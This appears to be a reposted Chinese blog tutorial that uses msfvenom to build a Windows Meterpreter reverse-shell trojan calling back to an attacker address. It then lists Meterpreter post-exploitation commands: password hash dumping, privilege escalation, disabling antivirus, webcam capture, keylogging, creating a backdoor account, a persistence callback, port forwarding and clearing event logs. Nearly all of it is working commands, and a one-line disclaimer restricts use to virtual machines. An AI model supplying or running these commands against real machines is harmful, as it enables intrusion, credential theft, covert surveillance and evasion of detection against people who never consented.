此文章为kali生成windows木马程序,进行的后渗透测试。此操作仅供虚拟机测试,请勿使用于非法途径。
一、生成windows执行木马程序
-p windows/x64/meterpreter/reverse_tcp //载入64位payload攻击载荷,如需32位把x64去掉即可
lhost=192.168.2.129 //设置本机kali的IP地址
lport=6666 //设置一个监听端口,可以随意,未被占用即可
-f exe //定义此文件的类型为exe
-o /home/mm.exe //生成木马程序到home目录下且命名为mm.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.129 lport=6666 -f exe -o /home/mm.exe
二、进入msfconsole进行监听目标上线
msfconsole //进入框架
use exploit/multi/handler //载入模块
set payload windows/meterpreter/reverse_tcp //加载攻击负载核
set lhost 192.168.2.129 //设置本地监听地址,和生成的木马地址一致
set lport 6666 //设置本地监听端口,和生成的木马地址一致
run / exploit //开始执行,等待目标上线
三、目标运行木马
当目标运行该木马程序,kali监听成功就会变成meterpreter
四、后渗透
Post后渗透模块
sysinfo #查看目标主机系统信息
run scraper #查看目标主机详细信息
run hashdump #导出密码的哈希
load kiwi #加载
ps #查看目标主机进程信息
pwd #查看目标当前目录(windows)
getlwd #查看目标当前目录(Linux)
search -f *.jsp -d e:\ #搜索E盘中所有以.jsp为后缀的文件
download e:\test.txt /root #将目标机的e:\test.txt文件下载到/root目录下
upload /root/test.txt d:\test #将/root/test.txt上传到目标机的 d:\test\ 目录下getpid #查看当前Meterpreter Shell的进程
PIDmigrate 1384 #将当前Meterpreter Shell的进程迁移到PID为1384的进程上
idletime #查看主机运行时间
getuid #查看获取的当前权限
getsystem #提权
run killav #关闭杀毒软件
screenshot #截图
webcam_list #查看目标主机的摄像头
webcam_snap #拍照
webcam_stream #开视频
execute 参数 -f 可执行文件 #执行可执行程序
run getgui -u hack -p 123 #创建hack用户,密码为123
run getgui -e #开启远程桌面
keyscan_start #开启键盘记录功能
keyscan_dump #显示捕捉到的键盘记录信息
keyscan_stop #停止键盘记录功能
uictl disable keyboard #禁止目标使用键盘
uictl enable keyboard #允许目标使用键盘
uictl disable mouse #禁止目标使用鼠标
uictl enable mouse #允许目标使用鼠标
load #使用扩展库
run #使用扩展库
run persistence -X -i 5 -p 8888 -r 192.168.10.27 #反弹时间间隔是5s 会自动连接
192.168.27的4444端口,缺点是容易被杀毒软件查杀
portfwd add -l 3389 -r 192.168.11.13 -p 3389 #将192.168.11.13的3389端口转发到本地的3389端口上,这里的192.168.11.13是获取权限的主机的ip地址
clearev #清除日志
本章内容就讲解如上,更多的内容需要自行深入研究。
版权归原作者 糕人 所有, 如有侵权,请联系我们删除。